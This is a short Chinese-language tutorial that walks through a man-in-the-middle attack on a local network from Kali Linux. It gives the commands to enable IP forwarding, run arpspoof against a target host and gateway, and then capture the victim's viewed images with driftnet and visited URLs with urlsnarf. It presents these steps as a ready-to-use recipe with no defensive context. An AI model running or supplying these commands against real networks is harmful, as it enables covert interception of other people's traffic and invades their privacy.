前提:在同一片局域网内
原理:将目标主机的流量流向kali,再将流量转发给网关
在kali系统的终端输入:
echo 1 > /proc/sys/net/ipv4/ip_forward开启ip转发
cat /proc/sys/net/ipv4/ip_forward 若返回 1 ,说明成功开启了
arpspoof -t 目标主机 目标网关 -i 网卡
利用arpspoof工具进行arp欺骗 安装arpspoof工具
driftnet -i 网卡
driftnet是一个专门抓图片包的工具,回车之后会跳出一个黑框,黑框中出现的图片都是目标主机浏览的。
urlsnarf -i eth0
urlsnarf这个工具可以抓取正在浏览的网址。
但是只有没有加密的网站才能抓取到,如http和ftp。https则不能通过这个方法抓取到。